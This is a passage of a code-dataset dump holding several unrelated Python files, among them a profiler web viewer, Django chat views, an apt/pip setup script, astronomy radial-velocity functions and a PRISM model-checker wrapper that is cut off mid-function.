profile is of the form\n # ```\n # import time: self [us] | cumulative | imported package\n # import time: 378 | 378 | zipimport\n # import time: 1807 | 1807 | _frozen_importlib_external\n # import time: 241 | 241 | _codecs\n # import time: 6743 | 6984 | codecs\n # import time: 1601 | 1601 | encodings.aliases\n # import time: 11988 | 20571 | encodings\n # import time: 700 | 700 | encodings.utf_8\n # import time: 535 | 535 | _signal\n # import time: 1159 | 1159 | encodings.latin_1\n # [...]\n # ```\n # The indentation in the last column signals parent-child relationships. In the\n # above example, `encodings` is parent to `encodings.aliases` and `codecs` which in\n # turn is parent to `_codecs`.\n entries = []\n with open(filename, \"r\") as f:\n # filtered iterator over lines prefixed with \"import time: \"\n import_lines = (\n line[len(\"import time: \") :].rstrip()\n for line in f\n if line.startswith(\"import time: \")\n )\n\n try:\n line = next(import_lines)\n except UnicodeError:\n raise TunaError()\n\n assert line == \"self [us] | cumulative | imported package\"\n\n for line in import_lines:\n items = line.split(\" | \")\n assert len(items) == 3\n self_time = int(items[0])\n last = items[2]\n name = last.lstrip()\n num_leading_spaces = len(last) - len(name)\n assert num_leading_spaces % 2 == 0\n level = num_leading_spaces // 2\n entries.append((name, level, self_time))\n\n def shelf(lst, k):\n reference_level = lst[k][1]\n out = []\n while k < len(lst):\n name, level, self_time = lst[k]\n if level == reference_level:\n module = name.split(\".\")[0]\n if module in built_in:\n color = 1\n elif module in built_in_deprecated:\n color = 2\n else:\n color = 0\n out.append({\"name\": name, \"value\": self_time * 1.0e-6, \"color\": color})\n k += 1\n elif level < reference_level:\n return out, k\n else:\n assert level == reference_level + 1\n out[-1][\"children\"], k = shelf(lst, k)\n return out, k\n\n lst, k = shelf(entries[::-1], 0)\n assert k == len(entries)\n\n return {\"name\": \"main\", \"color\": 0, \"children\": lst}\n\n\ndef start_server(prof_filename, start_browser):\n data = read(prof_filename)\n this_dir = os.path.dirname(__file__)\n data = data\n\n class IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\n os.path.join(this_dir, \"web\", \"index.html\"),\n data=tornado.escape.json_encode(data),\n version=__version__,\n )\n return\n\n app = tornado.web.Application(\n [(r\"/\", IndexHandler)], static_path=os.path.join(this_dir, \"web\", \"static\")\n )\n\n port = None\n for prt in range(8000, 8100):\n try:\n app.listen(prt)\n except OSError:\n pass\n else:\n port = prt\n break\n assert port is not None, \"Could not find open port.\"\n\n address = \"http://localhost:{}\".format(port)\n print(\"Started tuna server at {}\".format(address))\n\n if start_browser:\n threading.Thread(target=lambda: webbrowser.open_new_tab(address)).start()\n\n try:\n tornado.ioloop.IOLoop.instance().start()\n except KeyboardInterrupt:\n tornado.ioloop.IOLoop.instance().stop()\n print(\"\\nBye!\")\n return\n","sub_path":"tuna/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"255694625","text":"from math import sin, cos, pi\nimport numpy as np\nfrom numpy import uint8\n\ndef rotate(l, n):\n '''rotate list l by n'''\n return l[n:] + l[:n]\n\nclass ColorWheel(object):\n ''' A convenience function for creating/parametrizing colors '''\n def __init__(self, size = 256, red = True, green = True, blue = True):\n self.size = size\n self.dt = 2*pi / size\n self.R, self.G, self.B = red, green, blue\n\n colors = sum([red, green, blue]) # How many colors do we have?\n spread = size // 2 # Spread to side from peak\n if colors:\n spread = size // (colors)\n else:\n raise Exception(\"Color wheel with no colors is dumb. Stop it\")\n dc = 255 / spread # The color delta\n decr = [uint8(255 - int(i * dc)) for i in range(spread)]\n incr = decr[::-1]\n filler = [uint8(0) for i in range(size - 2*len(incr))]\n cdist = decr + filler + incr\n zdist = [uint8(0) for i in range(size)]\n # Build it!\n if colors == 0: # Dumb, what do we do?\n pass\n elif colors == 1:\n\n if red:\n pR = rotate(cdist, 0)\n else:\n pR = zdist\n if green:\n pG = rotate(cdist, 0)\n else:\n pG = zdist\n if blue:\n pB = rotate(cdist, 0)\n else:\n pB = zdist\n elif colors == 2:\n colorseen = 0\n if red:\n pR = rotate(cdist, 0)\n colorseen += 1\n else:\n pR = zdist\n\n if green:\n pG = rotate(cdist, int(colorseen * size / 3))\n colorseen += 1\n else:\n pG = zdist\n\n if blue:\n pB = rotate(cdist, int(colorseen * size / 3))\n else:\n pB = zdist\n\n elif colors == 3:\n pR = rotate(cdist, 0)\n pG = rotate(cdist, size // 3)\n pB = rotate(cdist, -1 * size // 3)\n self.colors = list(zip(pR, pG, pB))\n\n\n def __call__(self, i, damp = 1.0):\n i = i % self.size\n if damp <= 0.0:\n return (0,0,0)\n if damp < 1.0:\n return tuple(map(lambda x : uint8(x*damp), self.colors[i]))\n return self.colors[i]\n\n\n","sub_path":"src/musicvisualizer/utils/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"93625597","text":"from django.contrib.auth import get_user_model, authenticate, login, logout\nfrom django.contrib import messages\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\n\nfrom .models import *\nfrom .serializers import *\nfrom .forms import *\n\nclass Home(View):\n template_name = \"index.html\"\n\n def get(self, request, *args, **kwargs):\n if request.user.is_authenticated:\n user_initial = request.user.username[0].upper()\n contacts = Contact.objects.all()\n return render(request, self.template_name, locals())\n else:\n return redirect(\"login\")\n\ndef disconnect(request):\n show_hidden = \"hidden\"\n logout(request)\n return redirect(\"login\")\n\n\nclass Connexion(View):\n template_name = \"login.html\"\n next_p = \"home\"\n\n def get(self, request, *args, **kwargs):\n form = ConnexionForm()\n try:\n self.next_p = request.GET[\"next\"]\n except:\n print\n return render(request, self.template_name, locals())\n\n def post(self, request, *args, **kwargs):\n form = ConnexionForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n if user: # Si l'objet renvoyé n'est pas None\n login(request, user)\n messages.success(request, \"You're now connected!\")\n return redirect(self.next_p)\n else:\n messages.error(request, \"logins incorrect!\")\n return render(request, self.template_name, locals())\n\nclass Chat(View):\n template_name = 'chat.html'\n next_p = \"home\"\n\n def get(self, request, id_user, *args, **kwargs):\n form = MessageForm()\n contacts = Contact.objects.all()\n user_initial = request.user.username[0].upper()\n source = request.user\n destination = User.objects.get(id=id_user)\n Message.objects\\\n .filter(Q(source=destination, destination=source))\\\n .update(read=True)\n messages = Message.objects.filter(\n Q(\n Q(source=source, destination=destination) |\n Q(source=destination, destination=source)\n )\n ).order_by(\"timestamp\")\n return render(request, self.template_name, locals())\n\n def post(self, request, id_user, *args, **kwargs):\n form = MessageForm(request.POST, request.FILES)\n if form.is_valid():\n message = form.save(commit=False)\n source = request.user\n destination = User.objects.get(id=id_user)\n message.source = source\n message.destination = destination\n message.save()\n messages = Message.objects.filter(\n Q(\n Q(source=source, destination=destination) |\n Q(source=destination, destination=source)\n )\n ).order_by(\"timestamp\")\n return render(request, self.template_name, locals())\n\nclass Register(View):\n template_name = 'register.html'\n next_p = \"home\"\n\n def get(self, request, *args, **kwargs):\n form = RegisterForm()\n try:\n self.next_p = request.GET[\"next\"]\n except:\n print\n return render(request, self.template_name, locals())\n\n def post(self, request, *args, **kwargs):\n form = RegisterForm(request.POST, request.FILES)\n if form.is_valid():\n try:\n username = form.cleaned_data['username']\n firstname = form.cleaned_data['firstname']\n lastname = form.cleaned_data['lastname']\n password = form.cleaned_data['password']\n picture = form.cleaned_data['picture']\n user = User.objects.create_user(\n username=username,\n password=password)\n user.first_name, user.last_name = firstname, lastname\n user.save()\n Contact(user=user, picture=picture).save()\n messages.success(request, \"Hello \"+username+\", youn are registered successfully!\")\n if user:\n login(request, user)\n return redirect(\"home\")\n except Exception as e:\n print(str(e))\n messages.error(request, str(e))\n return render(request, self.template_name, locals())\n\n\n\n","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412153599","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Movies',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Rater',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ('gender', models.CharField(choices=[('M', 'Male'), ('F', 'Female')], max_length=1)),\n ('age', models.CharField(choices=[('Under 18', 'Under 18'), ('18-24', '18-24'), ('25-34', '25-34'), ('35-44', '35-44'), ('45-49', '45-49'), ('50-55', '50-55'), ('56+', '56+')], max_length=1)),\n ],\n ),\n migrations.CreateModel(\n name='Ratings',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, verbose_name='ID', serialize=False)),\n ],\n ),\n ]\n","sub_path":"movieratings/moviebase/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"325549618","text":"#!/usr/bin/python\n\nfrom os import system\n\n\nf = open('requirements.txt', 'r').readlines()\nfor line in f:\n flag = False\n command = line.split('|')\n cmd = command[0]\n app = command[1]\n\n if cmd == 'ppa':\n prefix = 'yes ENTER | '\n code = 'sudo add-apt-repository '\n elif cmd == 'update':\n prefix = ''\n code = 'sudo apt-get update'\n elif cmd == 'upgrade':\n prefix = ''\n code = 'sudo apt-get upgrade'\n elif cmd == 'pipu':\n prefix = ''\n code = 'sudo pip install -U '\n elif cmd == 'apt':\n prefix = 'yes | '\n code = 'sudo apt-get install '\n elif cmd == 'remove':\n prefix = 'yes | '\n code = 'sudo apt-get remove '\n elif cmd == 'pip':\n prefix = 'yes | '\n code = 'sudo pip install '\n\n install = prefix + code + app\n system(install)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"124714749","text":"#!/usr/bin/python\n\n\"\"\"\nOutput lines selected randomly from a file\n\nCopyright 2005, 2007 Paul Eggert.\nCopyright 2010 Darrell Benjamin Carbajal.\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation; either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nPlease see for a copy of the license.\n\n$Id: randline.py,v 1.4 2010/04/05 20:04:43 eggert Exp $\n\"\"\"\n\nimport random, sys\nfrom optparse import OptionParser\n\nclass randline:\n def __init__(self, filename):\n f = open(filename, 'r')\n self.lines = f.readlines()\n f.close()\n\n def chooseline(self):\n return random.choice(self.lines)\n\ndef main():\n\tversion_msg = \"%prog 2.0\"\n\tusage_msg = \"\"\"%prog [OPTION]... FILE\n\n\tOutput randomly selected lines from FILE.\"\"\"\n\n\tparser = OptionParser(version=version_msg, usage=usage_msg)\n\tparser.add_option(\"-n\", \"--head-count\", action=\"store\", dest=\"COUNT\", default=\"untilEOF\", help=\"output at most COUNT lines\")\n\tparser.add_option(\"-e\", \"--echo\", action=\"store_true\", dest=\"ECHO\", help=\"treat each ARG as an input line\")\n\tparser.add_option(\"-r\", \"--repeat\", action=\"store_true\", dest=\"REPEAT\", help=\"output lines can be repeated\")\n\t \n\toptions, args = parser.parse_args(sys.argv[1:]) \n\n\tif len(args)==0:\n\t\targs.append(sys.stdin.readline().rstrip('\\n'))\n\telif args[0]==\"-\": \n\t\targs[0]=sys.stdin.readline().rstrip('\\n')\n\n\tfor k in range(len(args)):\t\n\t\tinput_file = args[k]\n\t\ttry:\n\t\t\tgenerator = randline(input_file)\n\t\texcept IOError as err:\n\t\t\terrno, strerror = err.args\n\t\t\tprint(\"I/O error({0}): {1}\".format(errno, strerror))\n\n\t\tif options.ECHO==True:\n\t\t\tfor i in range(len(args)):\n\t\t\t\targs[i]=args[i]+\"\\n\"\n\t\t\tgenerator.lines=args\n\n\t\ttry:\n\t\t\tif options.COUNT==\"untilEOF\":\n\t\t\t\tif options.REPEAT==True:\t\t\t\n\t\t\t\t\tnumlines=sys.maxsize\n\t\t\t\telse:\t\n\t\t\t\t\tnumlines=int(len(generator.lines))\n\t\t\telse:\n\t\t\t\tnumlines = int(options.COUNT)\n\t\texcept:\n\t\t\tparser.error(\"invalid NUMLINES: {0}\".\n\t\t\t\t format(options.COUNT))\n\n\t\tif numlines < 0:\n\t\t\tparser.error(\"negative count: {0}\".\n\t\t\t\t format(options.COUNT))\n\t\t \n\t\tlist=[]\n\t\ti=0\n\t\twhile i < numlines:\n\t\t\tfound=False\n\t\t\toutput=generator.chooseline()\n\t\t\tif options.REPEAT==None:\n\t\t\t\tfor j in range(len(list)):\n\t\t\t\t\tif list[j]==output:\n\t\t\t\t\t\tfound=True\n\t\t\t\t\t\tbreak\n\t\t\t\tif found==False:\n\t\t\t\t\tlist.append(output)\n\t\t\t\tif len(generator.lines) <= i:\n\t\t\t\t\tbreak\n\n\t\t\tif found==False:\n\t\t\t\tsys.stdout.write(output)\n\t\t\t\ti += 1\n \n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Assignment 03/shuf.py","file_name":"shuf.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"603017478","text":"__author__ = 'sainatha798'\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom . import views\napp_name = 'postfeed'\nurlpatterns = [\n url(r'^$', views.index, name='post_home'),\n url(r'^post/$', views.Add_post.as_view(), name='addpost'),\n url(r'^postTag/(?P[0-9]+)/$', views.addPostTag, name='addPostTag'),\n url(r'^chgpref',views.changepref, name='changepref'),\n url(r'^addtag/$', views.n, name='n'),\n url(r'^addtag/(?P[0-9]+)/$', views.addtag, name='addtag'),\n url(r'^edit/$', views.edit, name='edit'),\n url(r'^user/$', views.post, name='user'),\n url(r'^feed/$', views.feed, name= 'feed'),\n\turl(r'^news_feed/$', views.rss, name= 'news_feed'),\n]","sub_path":"iitbhu/postfeed/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298420885","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n \ndf = pd.read_csv('../datafile/adjust.txt', header=None, delimiter=' ')\ndf2 = pd.read_csv('../datafile/outsideWhorg.txt', header=None, delimiter='\\n')\n\nlabels = df[0].values\ninfected = df[2].values\nrecover = df2[0].values\nfont={'fontname':'Helvetica','size':10}\nwordfont={'fontname':'Helvetica','size':7}\nx = np.arange(len(labels)) # the label locations\n\nfig, ax = plt.subplots()\n\ndef plotData(plt):\n plt.plot(labels, infected, '-o',label = \"predict\")\n plt.plot(labels, recover,'-o', label = \"real\")\n plt.legend(loc='upper left')\n \nax.set_ylabel('Infected/Recover cases')\nax.set_xlabel('Day',**font)\nax.set_title('Novel CoronaVirus cases Prediction')\nax.set_xticks(x)\nax.set_xticklabels(labels,rotation=90,**wordfont)\n\ndef autolabel(index):\n M =0\n cnt =0\n \"\"\"Attach a text label above each bar in *rects*, displaying its height.\"\"\"\n for i in range (0,index.size):\n height = infected.item(int(i))\n if height>M:\n M=height\n for i in range (0,index.size):\n height = infected.item(int(i))\n cnt =cnt+1\n if height ==M:\n ax.annotate('{}'.format(height),\n xy=(cnt,height),\n xytext=(0, 1), # 3 points vertical offset\n textcoords=\"offset points\",\n ha='center', va='bottom')\n \nautolabel(infected)\n#autolabel(recover)\nplotData(plt)\n\nprint('HI')\nplt.show()\n","sub_path":"nCoV_v2/PyPlots/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"653574037","text":"from __future__ import print_function, division\nimport numpy as np\nfrom matplotlib import rc\nfrom PyAstronomy import pyasl\nfrom astropy import constants as const\nfrom astropy import units as u\n'''\nThis function calculates synthetic radial velocity curves using the form:\nRV = gamma + K * (e * cos(w) + cos(theta(t) + w)), Keplarian MarkleyKESolver\n\nTHIS IS A GREAT DOCSTRING BUT IT TRADITIONALLY GOES INSIDE THE FUNCTION :)\n__________________________________________________________________________\n\n Parameters:\n__________________________________________________________________________\nphases : `np.array` Array of phases, typically from 0 to 1\n omega : `int` Argument of periapsis [degrees] ... REALLY NOW\n K : `int` Velocity semi-amplitude [km/s]\n ecc : `int` Eccentricity of the system\n gamma : `int` Systemic Velocity [km/s]\n__________________________________________________________________________\n\n Returns:\n__________________________________________________________________________\nKepRVCurve : a 1D array of RVs corresponding to phases\n'''\ndef getkepRV(phases, ecc, omega, gamma, K):\n ks = pyasl.MarkleyKESolver() # Initializes the Keplarian Solver\n #theta = [] # Makes empty list for theta NOT NEEDED\n KepRVCurve = [] # Makes empty list for RV curve data\n\n## Run Keplarian solver MarkleyKESolver() to find the mean anomaly as a function\n## of phase [M_ph], the eccentric anomaly E_ph, and the True anomaly, Tru, or\n## theta, the missing piece of the RV curve calculation\n for phase in phases: # Loop over phases\n MeAn = 2. * np.pi * phase # Solve for mean anomaly, M(phase)\n EcAn = ks.getE(MeAn, ecc) # Solve for eccentric anomaly, E\n\n # Compute the true anomaly\n cosTru = (np.cos(EcAn) - ecc) / (1 - ecc*np.cos(EcAn))\n sinTru = (np.sqrt(1 - ecc**2) * np.sin(EcAn)) / (1 - ecc*np.cos(EcAn))\n Tru = np.arctan2(sinTru, cosTru)\n\n RV = gamma + K * (ecc * np.cos(omega) + np.cos(Tru + omega))\n\n## How exciting, now we've got all the pieces needed to solve for the Keplarian\n## projected RV curve!\n #result = np.add(system,costhetaplusomega) # NO THIS WON'T WORK\n KepRVCurve.append(RV) # add RV curve to the empty list\n\n return KepRVCurve\n\ndef getK(Porb, M1, M2, incl, ecc):\n '''\n Original version by Joni is in comments,\n Slightly condensed edits by Meredith appear as-is\n '''\n# M1_app = M1.to(u.kg) + M2.to(u.kg)\n# P_orb = Porb.to(u.second)\n# twopiG = 2. * cons.pi * cons.G\n# twopiGoverP = np.divide(twopiG, P_orb)\n# part_1 = twopiGoverP**(1/3)\n# M2sin_i = M2.to(u.kg) * np.sin(incl.to(u.deg))\n# M1pow2third = (M1.to(u.kg) + M2.to(u.kg))**(2/3)\n# part_2 = M2sin_i / M1pow2third\n# part_a = part_1 * part_2\n# part_n = np.sqrt(1 - ecc**2)\n# part_3 = 1 / part_n\n# \n# K = np.multiply(part_a, part_3)\n# return(K)\n\n twopiG = 2. * np.pi * const.G\n twopiGoverP = np.divide(twopiG, Porb)\n part_1 = twopiGoverP**(1/3)\n\n M2sin_i = M2 * np.sin(incl)\n M1pow2third = (M1 + M2)**(2/3)\n part_2 = M2sin_i / M1pow2third\n \n part_3 = 1. / np.sqrt(1 - ecc**2)\n\n K = np.multiply(part_1*part_2, part_3)\n \n # ALL IN ONE LINE MWAHAHA -MR\n K1_calc = ((2*np.pi*const.G / Porb)**(1/3)) * ((M2*np.sin(incl)) / (M1+M2)**(2/3)) * (1/np.sqrt(1 - ecc**2))\n\n return K","sub_path":"keplarRV.py","file_name":"keplarRV.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"458767198","text":"# coding: utf-8\n\nfunctions = [\n 'draw', 'update', 'on_start',\n 'on_stop', 'on_pause', 'on_resume'\n]\n\nclass State:\n def __init__(self, ctx):\n self.ctx = ctx\n\n def __str__(self):\n return self.__class__.__name__\n\n def __getattr__(self, name):\n if name in functions:\n return lambda *a, **k: None\n\n raise AttributeError(name)\n\nclass StateManager:\n def __init__(self):\n self.states = []\n\n @property\n def state(self):\n try:\n return self.states[-1]\n except IndexError:\n return None\n\n def pop(self):\n if not self.state:\n raise Exception('state stack is empty')\n\n self.state.on_stop()\n self.states.pop()\n\n if self.state:\n self.state.on_resume()\n\n def set(self, state):\n if not isinstance(state, State):\n raise Exception('`state` must be an instance of `State`')\n\n if self.state:\n self.state.on_stop()\n self.states.pop()\n\n self.states.append(state)\n self.state.on_start()\n\n def push(self, state):\n if not isinstance(state, State):\n raise Exception('`state` must be an instance of `State`')\n\n if self.state:\n self.state.on_pause()\n\n self.states.append(state)\n self.state.on_start()","sub_path":"apeiron/core/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178857238","text":"import sys\nimport argparse\n\ndef parseArgument():\n\t# Parse the input\n\tparser=argparse.ArgumentParser(description=\\\n\t\t\t\"Get the positions with the top scores and their scores\")\n\tparser.add_argument(\"--bedFileNameListFileName\", required=True,\\\n\t\t\thelp='File with list of bed or narrowPeak files')\n\tparser.add_argument(\"--scriptFileName\", required=True,\\\n\t\t\thelp='Output file name for script')\n\toptions = parser.parse_args()\n\treturn options\n\ndef makeIntersectBedAllPairsScript(options):\n\t# Make a script that will run intersectBed for all pairs of files in both directions\n\tbedFileNameListFile = open(options.bedFileNameListFileName)\n\tbedFileNameList = [line.strip() for line in bedFileNameListFile.readlines()]\n\tbedFileNameListFile.close()\n\tscriptFile = open(options.scriptFileName, 'w+')\n\tfor bedFileName in bedFileNameList:\n\t\t# Iterate through the bed files and make a line the script for each paired with every other bed file as well as a line number count line\n\t\tscriptFile.write(\"echo \" + bedFileName + \"\\n\")\n\t\tscriptStringWC = \"{0} {1} {2}\\n\".format(\"zcat\", bedFileName, \"| wc\")\n\t\tscriptFile.write(scriptStringWC)\n\t\tfor otherBedFileName in bedFileNameList:\n\t\t\t# Iterate through the other bed files and make a line for intersecting each with the current bed file\n\t\t\tif bedFileName == otherBedFileName:\n\t\t\t\t# The other bed file is the current bed file, so skip it\n\t\t\t\tcontinue\n\t\t\tscriptStringIntersect = \"{0} {1} {2} {3} {4}\\n\".format(\"intersectBed -wa -a\", bedFileName, \"-b\", otherBedFileName, \"| sort -u -k1,1 -k2,2n -k3,3n | wc\")\n\t\t\tscriptFile.write(scriptStringIntersect)\n\tscriptFile.close()\n\t\nif __name__ == \"__main__\":\n\toptions = parseArgument()\n\tmakeIntersectBedAllPairsScript(options)\n","sub_path":"makeIntersectBedAllPairsScript.py","file_name":"makeIntersectBedAllPairsScript.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222645107","text":"import unittest\nimport datetime as dt\n\nfrom server import config\nfrom server.platforms.twitter_crimson_hexagon import TwitterCrimsonHexagonProvider\n\nTEST_MONITOR_ID = 123456789 # replace with an active live CH Monitor to test effectively\n\n\nclass TwitterCrimsonHexagonProviderTest(unittest.TestCase):\n\n def setUp(self):\n self._provider = TwitterCrimsonHexagonProvider(config.get('CRIMSON_HEXAGON_API_KEY'))\n\n def test_sample(self):\n results = self._provider.sample(None, start_date=dt.datetime(2019, 1, 1), end_date=dt.datetime(2020, 1, 1),\n monitor_id=TEST_MONITOR_ID)\n assert isinstance(results, list) is True\n\n def test_count_over_time(self):\n results = self._provider.count_over_time(None, start_date=dt.datetime(2019, 1, 1),\n end_date=dt.datetime(2020, 1, 1), monitor_id=TEST_MONITOR_ID)\n assert 'counts' in results\n assert isinstance(results['counts'], list) is True\n assert len(results['counts']) > 6\n\n def test_count(self):\n results = self._provider.count(None, start_date=dt.datetime(2019, 1, 1), end_date=dt.datetime(2020, 1, 1),\n monitor_id=TEST_MONITOR_ID)\n assert results['counts'] > 0\n\n def test_words(self):\n results = self._provider.words(None, start_date=dt.datetime(2019, 1, 1), end_date=dt.datetime(2020, 1, 1),\n monitor_id=TEST_MONITOR_ID)\n last_count = 999999999999\n for item in results:\n assert item['count'] > 0\n assert item['count'] <= last_count\n last_count = item['count']\n\n","sub_path":"server/platforms/test/test_twitter_crimson_hexagon.py","file_name":"test_twitter_crimson_hexagon.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"287691149","text":"import glob\nimport os\nimport platform\nimport re\nimport socket\nimport subprocess\nimport sys\nfrom time import time, strftime, localtime\nfrom pathlib import Path\n\nimport psutil\nfrom termcolor import colored\n\nimport configparser\n\nconfig = configparser.ConfigParser()\n# print(os.getcwd())\nworkspace = os.path.dirname(__file__)\n# print(\"workspace\", workspace)\ncwd = os.getcwd()\nos.chdir(workspace)\n\nconfig.read(os.path.join(workspace, \"../config.ini\"))\n# config.sections()\n# prism_path = config.paths['prism_path']\n\nprism_path = config.get(\"mandatory_paths\", \"prism_path\")\nif not os.path.exists(prism_path):\n raise OSError(__file__ + \": Directory does not exist: \" + str(prism_path))\n\nmodel_path = config.get(\"paths\", \"models\")\nif not os.path.exists(model_path):\n raise OSError(__file__ + \": Directory does not exist: \" + str(model_path))\n\nproperties_path = config.get(\"paths\", \"properties\")\nif not os.path.exists(properties_path):\n raise OSError(__file__ + \": Directory does not exist: \" + str(properties_path))\n\nprism_results = config.get(\"paths\", \"prism_results\")\nif not os.path.exists(prism_results):\n os.makedirs(prism_results)\n\nstorm_results = config.get(\"paths\", \"storm_results\")\nif not os.path.exists(storm_results):\n os.makedirs(storm_results)\n\n\nif \"prism\" not in os.environ[\"PATH\"]:\n print(\"prism was probably not in PATH, adding it there\")\n if \"wind\" in platform.system().lower():\n os.environ[\"PATH\"] = os.environ[\"PATH\"] + \";\" + prism_path\n else:\n os.environ[\"PATH\"] = os.environ[\"PATH\"] + \":\" + prism_path\n\nfrom load import parse_params_from_model\nfrom common.files import write_to_file\nos.chdir(cwd)\n\n\ndef set_javaheap_win(size):\n \"\"\" Changing the java heap size for the PRISM on Windows\n\n Args:\n size (string): sets maximum memory, see https://www.prismmodelchecker.org/manual/ConfiguringPRISM/OtherOptions\n\n Returns:\n previous value of memory\n \"\"\"\n previous_size = -5\n output = \"\"\n\n with open(os.path.join(str(prism_path), \"prism.bat\"), 'r') as input_file:\n # print(input_file)\n for line in input_file:\n output = output + str(line)\n if line.startswith('java'):\n # print(\"line\", line)\n previous_size = re.findall(r'-Xmx.+[g|G|m|M] -X', line)\n # print(\"previous_size: \", previous_size)\n previous_size = previous_size[0][4:-3]\n # print(\"previous_size: \", previous_size)\n\n a = str(f'-Xmx{str(size)} -X')\n # print(a)\n output = re.sub(r'-Xmx.+[g|G|m|M] -X', a, output)\n # print(\"output: \", output)\n\n with open(os.path.join(str(prism_path), \"prism.bat\"), 'w') as input_file:\n input_file.write(output)\n\n if previous_size == -5:\n print(\"Error occurred while reading the prism.bat file\")\n return\n\n return previous_size\n\n\n## TODO rewrite this without the paths, just files\ndef call_prism(args, seq=False, silent: bool = False, model_path=model_path, properties_path=properties_path,\n prism_output_path=prism_results, std_output_path=prism_results, std_output_file=False):\n \"\"\" Solves problem of calling prism from another directory.\n\n Args:\n args (string): args for executing prism\n seq (bool): if true it will take properties one by one and append the results (helps to deal with memory)\n silent (bool): if silent command line output is set to minimum\n model_path (string): path to load models from\n properties_path (string): path to load properties from\n prism_output_path (string): path to save the files inside the command\n std_output_path (string): path to save the results of the command\n std_output_file (string): file name to save the output\n \"\"\"\n # print(\"prism_results\", prism_results)\n # print(\"std_output_path\", std_output_path)\n # print(\"std_output_file\", std_output_file)\n\n if std_output_path is not None:\n output_file_path = Path(args.split()[0]).stem\n # print(\"output_file_path\", output_file_path)\n if not std_output_file:\n # print(\"if\")\n output_file_path = os.path.join(std_output_path, Path(output_file_path + \".txt\"))\n else:\n # print(\"else\")\n output_file_path = os.path.join(prism_results, Path(str(std_output_file)))\n # print(\"new output_file_path\", output_file_path)\n else:\n output_file_path = \"\"\n\n # print(\"output_file_path\", output_file_path)\n\n # os.chdir(config.get(\"mandatory_paths\",\"cwd\"))\n curr_dir = os.getcwd()\n os.chdir(prism_path)\n # print(os.getcwd())\n prism_args = []\n\n try:\n # print(args.split(\" \"))\n\n args = args.split(\" \")\n # print(args)\n for arg in args:\n # print(arg)\n # print(re.compile('\\.[a-z]').search(arg))\n if re.compile('\\.pm').search(arg) is not None:\n model_file_path = os.path.join(model_path, arg)\n # print(model_file)\n if not os.path.isfile(model_file_path):\n print(f\"{colored('model file', 'red')} {model_file_path} {colored('not found -- skipped', 'red')}\")\n return 404, f\"model file {model_file_path} not found -- skipped\"\n prism_args.append(model_file_path)\n elif re.compile('\\.pctl').search(arg) is not None:\n property_file_path = os.path.join(properties_path, arg)\n # print(property_file)\n if not os.path.isfile(property_file_path):\n print(f\"{colored('property file', 'red')} {property_file_path} {colored('not found -- skipped', 'red')}\")\n return 404, f\"property file {property_file_path} not found -- skipped\"\n prism_args.append(property_file_path)\n elif re.compile('\\.txt').search(arg) is not None:\n print(\"prism_output_path\", prism_output_path)\n if not os.path.isabs(prism_output_path):\n prism_output_path = os.path.join(Path(prism_results), Path(prism_output_path))\n\n if not os.path.isdir(prism_output_path):\n if not silent:\n print(f\"{colored('The path', 'red')} {prism_output_path} {colored('not found, this may cause trouble', 'red')}\")\n\n prism_output_file_path = os.path.join(prism_output_path, arg)\n print(\"prism_output_file_path\", prism_output_file_path)\n prism_args.append(prism_output_file_path)\n else:\n prism_args.append(arg)\n # print(prism_args)\n # prism_args.append(\" \".join(args.split(\" \")[-2:]))\n # 